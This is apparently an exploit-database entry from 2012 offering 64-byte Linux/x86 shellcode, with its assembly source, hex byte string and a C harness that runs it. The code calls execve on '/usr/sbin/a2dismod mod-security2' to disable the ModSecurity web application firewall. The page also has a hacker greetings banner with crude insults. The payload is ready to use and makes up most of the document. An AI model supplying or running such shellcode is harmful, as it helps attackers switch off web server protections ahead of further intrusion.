Bugtraq shutdown modsecurity -Linux/x86 shellcode 64 bytes



EKU-ID: 1667 CVE: OSVDB-ID:
Author: TrOoN Published: 2012-03-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Title :Bugtraq  shutdown modsecurity -Linux/x86 shellcode 64 bytes
# Author : TrOoN
# E-mail : http://www.facebook.com/alexydant ( my new facebook )
# Home : city 617 logt Draria algeria
# Web Site : www.1337day.com
# Facebook : http://www.facebook.com/alexydant ( my new facebook)
# platform :     Bugtraq  Eng
# Type : Shellcode
# Tested on : Bugtraq
# download link : http://bugtraq-team.com/index.php/en
# home : city 617 logts DRARIA algeria 

###

##
# | >> --------+++=[ kadhafi rabi yarhmek ]=+++-------- << |
# | >  Ked ans | 1337| Rizky Ariestiyansyah | MOsta_team |Hidden-Pain |admin of dis9 team <|
# | > fire_hacker | elite_tr0jen | KinG Of PiraTeS |King Hacker <|
# | > phibe optik | Black-ID |Chevrosky Russticsh|Imed Lakamora |
# | > Brisco_Dz | malik_pc | T0x!c | security-ray|Šòufäïn Dz| hacker_1420 <|
# | > dz-team | password noob °_° | password m9awd tl3eb m3aya pff | Turk hack team <|
# | > The_viper |amine madrid| back track | metasploit | vivek | younes| l ansito asmholi :)
# | ------------------------------------------------- < |
##

 
      # we just begin here #
 *__asm__(
 *                "xor %eax,%eax \n"
 *                 "push %eax \n"
 *                 "cdq \n"
 *                 "push $0x646f6d73 \n"
 *                 "push $0x69643261 \n"
 *                 "push $0x2f6e6962 \n"
 *                 "push $0x732f7273 \n"
 *                 "push $0x752f2f2f \n"
 *                 "mov %esp,%ebx \n"
 *                 "push $0x32 \n"
 *                 "push $0x79746972 \n"
 *                 "push $0x75636573 \n"
 *                 "push $0x2d646f6d \n"
 *                 "mov %esp,%ecx \n"
 *                 "xor %edx,%edx \n"
 *                 "mov $0xb,%al \n"
 *                 "push %edx \n"
 *                 "push %ecx \n"
 *                 "push %ebx \n"
 *                 "mov %esp,%ecx \n"
 *                 "mov %esp,%edx \n"
 *                 "int $0x80 \n"
                   );
 */
char shellcode[]="\x31\xc0\x50\x99\x68\x73\x6d\x6f\x64\x68\x61\x32\x64\x69\x68\x62\x69\x6e\x2f\x68\x73\x72\x2f\x73\x68\x2f\x2f\x2f\x75\x89\xe3\x6a\x32\x68\x72\x69\x74\x79\x68\x73\x65\x63\x75\x68\x6d\x6f\x64\x2d\x89\xe1\x31\xd2\xb0\x0b\x52\x51\x53\x89\xe1\x89\xe2\xcd\x80";
 
int main()
{
        (*(void(*)())shellcode)();
        return 0;
}

# we just kill now
# 1337day.com